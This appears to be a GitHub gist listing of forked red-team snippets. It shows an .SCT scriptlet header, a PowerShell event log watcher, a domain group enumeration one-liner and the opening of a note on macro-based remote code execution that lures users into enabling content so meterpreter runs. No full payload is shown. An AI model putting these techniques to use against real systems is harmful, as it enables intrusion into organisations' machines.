@clr2of8
clr2of8 / test.sct
Created September 15, 2022 21:18 — forked from bohops/test.sct
.SCT for testing (++++ @subTee)
<?XML version="1.0"?>
<scriptlet>
<registration
description="Bandit"
progid="Bandit"
version="1.00"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
>
clr2of8 / Watch-EventLogTail.ps1
Created September 11, 2022 01:45 — forked from LeeHolmes/Watch-EventLogTail.ps1
Tail an event log through PowerShell
## PowerShell Eventing lets you tail an event log:
## http://powershellcookbook.com/recipe/IMyz/respond-to-automatically-generated-events
$watcher = New-Object System.Diagnostics.Eventing.Reader.EventLogWatcher "Microsoft-Windows-PowerShell/Operational"
Register-ObjectEvent $watcher EventRecordWritten -Action {
$event = $eventArgs.EventRecord
if($event.ProcessId -ne $pid)
{
## Save the last event into a variable in the PowerShell session if you want to explore its properties,
## as the eventing actions run in their own runspace
# $GLOBAL:lastEvent = $event
clr2of8 / groupenumeration.ps1
Created January 8, 2020 14:59 — forked from joswr1ght/groupenumeration.ps1
Create a Collection of Files for Windows Domain Groups with User Members in Each File
Get-AdGroup -Filter * | % { Get-AdGroupMember $_.Name | Select-Object -ExpandProperty SamAccountName | Out-File -FilePath "$($_.Name).txt" -Encoding ASCII }
clr2of8 / Various-Macro-Based-RCEs.md
Created March 14, 2019 14:59 — forked from mgeeky/Various-Macro-Based-RCEs.md
Various Visual Basic Macros-based Remote Code Execution techniques to get your meterpreter invoked on the infected machine.

This is a note for myself describing various Visual Basic macros construction strategies that could be used for remote code execution via malicious Document vector. Nothing new or fancy here, just a list of techniques, tools and scripts collected in one place for a quick glimpse of an eye before setting a payload.

All of the examples below were generated using 192.168.56.101 as the remote address.

List:

  1. Page substitution macro for luring user to click Enable Content
  2. The Unicorn Powershell based payload